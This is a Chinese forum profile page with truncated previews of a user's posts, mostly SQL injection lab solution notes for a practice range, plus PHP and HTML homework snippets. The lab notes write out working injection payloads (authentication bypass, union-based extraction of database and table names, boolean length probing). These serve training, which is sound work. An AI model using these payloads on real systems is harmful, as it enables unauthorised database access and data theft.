你看不见我啊

0Follows
0Fans
23Threads
Back Forum Home

You have published 23articleAdd Thread

小黑 6.6.3-SQL注入-Post注入Rank 3 解题笔记

')or 1=1# 登陆成功')or 1=2 order by 2# 测试得到有两个字段')or 1=2 union select 1,2# 成功,但无回显')or 1=2 union select 1,database()# 无回显 此时尝试布尔注入')or (lenght(database()))>7# 测试得到数据库长度为8')

 2019-1-2
 0 
 56 

小黑 6.6.2-SQL注入-Post注入Rank 2 解题笔记

' 错误'or 1=1# 错误根据靶场sql语句思考")or 1=1# 登陆成功")or 1=2 order by 2# 多次尝试发现字段数为2")or 1=2 union select 1,2# 回显注入点")or 1=2 union select 1,group_concat(database())# 得到库名:security&quot

 2018-12-30
 0 
 29 

小黑 6.6.1-SQL注入-Post注入Rank 1 解题笔记

' 报错 得知此处有注入漏洞'or 1=1 # 成功登陆'or 1=1 order by 2# by出字段数为2'or 1=2 union select 1,2# 爆出注入点'or 1=2 union select 1,database()# 得到库名security'or 1=2 union select 1,group_concat(table_

 2018-12-27
 0 
 32 

小黑 6.1.4-SQL注入-显错注入Rank 4 解题笔记

?id=1 正常根据靶场提示料及sql语句?id=1") --+ 正常?id=1") order by 3--+ 得到字段数?id=0") union select 1,2,3 --+得到注入点?id=0") union select 1,2,database() --+ 得到库名security?id=0") union select 1,2,g

 2018-12-26
 0 
 16 

小黑 6.1.3-SQL注入-显错注入Rank 3 解题笔记

 ?id=1 正常?id=1' 错误?id=1 order by 5 正常综上和靶场提示看到语句执行为 id=('')?id=1') order by 5 --+ 回显错误,3正常 说明已执行?id=1') u

 2018-12-26
 0 
 13 

小黑 6.1.1-SQL注入-显错注入Rank 1 解题笔记

sleep(5) 显示not found?id=1 sleep(5) 无效?id=1 显示正常?id=1' 显示错误此时判断可以进行sql注入根据靶场sql语句提示已初步了解?id=1 order by 5 无反应看反馈得知''里有两条执行语句?id=1 and order by 5 也无效?id=1' order by 5 --+ 注释掉了后面发现可执行 聂风教的

 2018-12-24
 0 
 35 

3.6、正则表达式【作业】

<?php$a=fopen("1.txt","r")or die("打不开文件");$b=fread($a,filesize("1.txt"));fclose($a);$b=preg_replace('/<phoneticpr fontId="1'' type="

 2018-11-14
 0 
 12 

3.5、PHP表单验证【作业】

<!DOCTYPE html><html><body><?php$servername = "localhost";$username = "root";$password = "root";$dbname = "mysql";$conn = new mysqli($serve

 2018-10-13
 0 
 23 

2.3&2.4、DIV+CSS【作业】

<!DOCTYPE HTML><html>    <head>        <meta charset="UTF-8">        <title>QQ空间-分享生活,留住感动</title> 

 2018-10-11
 0 
 13